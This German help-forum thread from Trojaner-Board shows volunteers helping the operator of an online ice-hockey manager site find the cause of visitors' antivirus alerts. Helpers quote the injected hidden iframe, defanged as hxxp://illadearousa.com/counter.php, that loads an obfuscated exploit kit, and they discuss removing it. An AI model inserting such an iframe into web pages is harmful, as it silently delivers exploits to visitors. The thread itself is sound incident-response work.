Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Homepage befallen? Kann doch nicht...

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 20.02.2013, 22:10   #1
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



Hallo,

Ich stehe vor einem Rätsel.
Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in den meisten Fällen antivir) beim Besuch unserer Homepage/Forum, Alarm schlägt.

Bei einem Mitglied hat sich sogar angeblich nach dem Besuch unserer Homepage etwas mit dem Namen "system progressive protection" installiert und er hat daraufhin wohl einen Großteil seiner Daten verloren...

Nur begreife ich das ganze nicht... Ich selber nutzte bis vergangenen Monat noch Kaspersky, welches NIE beim Besuch der Seite gemeckert hatte, auch wenn ich von der Arbeit aus die Seite aufgerufen habe, gab es nie Meldungen in der Art und dort nutzen wir Norton...
Auch bei einigen anderen Managern gab es nie solche Meldungen...
Darum kann ich das ganze nicht so recht glauben, das die Seite wirklich befallen ist..

Ich habe die Seite auch schon von Norton Safe Web scannen lassen, alles tadellos... Auch google sagt, die Seite ist frei von jeglicher Malware... Gleiche gilt für Websitedefender... auch dort wird mir gesagt, die Seite ist sauber...

Auch mein Hoster, sagt mir das diese keinerlei Meldungen erhalten haben... Wenn dem so wäre, wären die befallenen Dateien/Seiten auch schon längst gesperrt worden...


Ist es denn möglich, das der Befall sich nur auf bestimmte User auswirkt? Finde es halt nur komisch, das bei manchen das Virenprogramm meckert, einer sogar einen richtigen Befall hatte und die meisten überhaupt keine Probleme haben...


Und das die Virenprogramme hin und wieder meckern ist ja auch nicht ungewöhnlich... Google Chrome meckert bei mir hin und wieder auch, wenn ich mal eine Seite (z.B. Forenseite von meinem Fussballverein, meinem Lieblingsitaliener) aufrufe, diese sei Malware verseucht etc.



Könnt ihr mir weiterhelfen? Möchte nicht unnötig die Homepage platt machen...


mfg

Vain

Alt 20.02.2013, 22:12   #2
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



Hi ein paar der fundmeldungen hier währen interessant.
übrigens bei der Rogue gehen die Daten nicht verloren, der gute Mann soll sich mal hier melden.
die seite währe auch günstig.
__________________

__________________

Alt 20.02.2013, 22:29   #3
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



Also die Seite ist:
hxxp://www-tiger-area.com
und das Forum ist über:
hxxp://tiger-area.com/wbb3/
zu erreichen.

Also Fundmeldungen waren:
Web Attack Toolkit Website 8
Angreifender PC : Panelallegro.1110.pl

bei nem anderen ist die Seite gesperrt worden mit der Begründung "unsicheres Programm"
__________________

Alt 20.02.2013, 22:30   #4
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



die hier oder?
onlineeishockeymanager.de
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 22:35   #5
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



Zitat:
Zitat von markusg Beitrag anzeigen
die hier oder?
onlineeishockeymanager.de
tiger-area.com

bzw. forum:

tiger-area.com/wbb3/


Alt 20.02.2013, 23:10   #6
handball10
/// Helfer-Team
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



Halli Hallo

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:
ATTFilter
<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
         
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch
__________________
--> Homepage befallen? Kann doch nicht...

Alt 20.02.2013, 23:20   #7
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



hi
danke, währs möglich eine Kopie der Index.php zu bekommen?
bei
File-Upload.net - Ihr kostenloser File Hoster!
hochladen, link an mich als private nachicht.
ps von der
tiger-area.com
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 23:23   #8
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



@handball10
schön mal wieder von dir zu lesen :-)
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 23:30   #9
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



schonmal vielen dank euch beiden,

habe die index.php geschickt. jedoch vom forum. denn bei tiger-area.com ist die index ja eine .htm seite...
Hoffe das ist richtig so

Zitat:
Zitat von handball10 Beitrag anzeigen
Halli Hallo

die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht!

Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden:

Code:
ATTFilter
<iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
         
Der Inhalt des Frames bindet wiederum ein Inline-Frame ein, hinter welchem sich ein Exploit-Kit verbirgt...
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated )- Fortsetzung folgt.

Am besten, du suchst in jedem Fall die gesamte Seite einmal durch.
Wer weiß, was da noch so rumschwirrt...

Einen schönen Abend noch
Hmm wie kann ich die Seite denn überprüfen?
habe mir jetzt einfach mal die startseite runtergezogen, also die index.htm...
und jetzt meckert auch kaspersky bei mir und löscht die datei sofort...

Alt 20.02.2013, 23:36   #10
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



hi dann die index.html.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 23:40   #11
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



problem ist, ich bekomme die nich heruntergeladen... kaspersky löscht die sofort ... oder kann ich da eine ausnahme setzen? also die datei erlauben?

Alt 20.02.2013, 23:41   #12
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



müsste sich kurzfristig deaktivieren lassen, versuch mal über rechtsklick auf das Symbol im Infobereich.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 23:46   #13
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



hab dir die datei geschickt

Alt 20.02.2013, 23:49   #14
markusg
/// Malware-holic
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



danke.
hast du backups deiner homepages? dann könnte man die einspielen, natürlich vorher schauen ob das frame eingebunden ist am ende der seite.
__________________
-Verdächtige mails bitte an uns zur Analyse weiterleiten:
markusg.trojaner-board@web.de
Weiterleiten
Anleitung:
http://markusg.trojaner-board.de
Mails bitte vorerst nach obiger Anleitung an
markusg.trojaner-board@web.de
Weiterleiten
Wenn Ihr uns unterstützen möchtet

Alt 20.02.2013, 23:52   #15
MrVain712
 
Homepage befallen? Kann doch nicht... - Standard

Homepage befallen? Kann doch nicht...



das backup ist leider auch befallen...
Würd es denn reichen, wenn ich die frames aus allen seiten rauslösche? habs gerade mal testweise bei einer seite gemacht, jetzt bleibt kaspersky bei dieser ruhig

Antwort

Themen zu Homepage befallen? Kann doch nicht...
alarm, antivir, bestimmte, daten, gesperrt, google, homepage, installiert, kaspersky, manager, meldungen, namen, nutzen, nutzte, online, problem, probleme, programm, programme, scan, scannen, seite, system, verseucht, web



Ähnliche Themen: Homepage befallen? Kann doch nicht...


  1. Homepage-web.com Virus nicht auffindbar
    Log-Analyse und Auswertung - 01.08.2015 (4)
  2. .scr Datei leider doch geöffnet - was kann ich tun ?
    Plagegeister aller Art und deren Bekämpfung - 02.10.2014 (6)
  3. bin befallen von rootkits/HKLM/ npGoogleUpdate3.detc./npvlc.dll Kann da eventuell mal jemand
    Log-Analyse und Auswertung - 05.09.2014 (12)
  4. Trojaner gelöscht, kann jetzt surfen, doch alle E-Mail clients, Dropbox etc gehen nicht!
    Plagegeister aller Art und deren Bekämpfung - 30.07.2012 (1)
  5. Problem mit avira zeigt versteckte befallen objekte an aber kann sie nicht finden!
    Log-Analyse und Auswertung - 22.04.2012 (5)
  6. WINNT.exe befallen mit einem Trojaner was kann oder muss ich tun
    Plagegeister aller Art und deren Bekämpfung - 28.07.2011 (3)
  7. Kann ein Grafiktablett von einem virus befallen werden?
    Diskussionsforum - 04.06.2011 (2)
  8. System Tool (doch nicht?) entfernt - Google Chrome startet nicht mehr
    Plagegeister aller Art und deren Bekämpfung - 15.03.2011 (16)
  9. Homepage von HiJackthis lässt sich nicht öffen / Bitte Logfile auswerten
    Log-Analyse und Auswertung - 05.11.2010 (1)
  10. Links werden umgeleitet, AV Webseiten und Programme funktionieren nicht mehr, Homepage gehackt
    Plagegeister aller Art und deren Bekämpfung - 13.07.2010 (12)
  11. TR/Dldr.Bagle.aag - Wie kann ich feststellen, ob ext Festplatte auch befallen ist?
    Mülltonne - 04.09.2008 (0)
  12. Hilfe komm nicht mehr auf unsre Homepage
    Plagegeister aller Art und deren Bekämpfung - 28.09.2007 (5)
  13. svshost.exe und andere würmer haben wohl meinen pc befallen!wer kann mir bitte helfen
    Log-Analyse und Auswertung - 20.06.2007 (5)
  14. Ich kann meinen PC nicht formatiern. Wieso?und was machen das das doch geschieht?
    Plagegeister aller Art und deren Bekämpfung - 21.01.2007 (2)
  15. MSN-Homepage geht nicht weg
    Log-Analyse und Auswertung - 18.07.2006 (10)
  16. BITTE HILFE, das kann doch nicht sein
    Alles rund um Windows - 19.01.2006 (58)

Zum Thema Homepage befallen? Kann doch nicht... - Hallo, Ich stehe vor einem Rätsel. Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in - Homepage befallen? Kann doch nicht......
Archiv
Du betrachtest: Homepage befallen? Kann doch nicht... auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.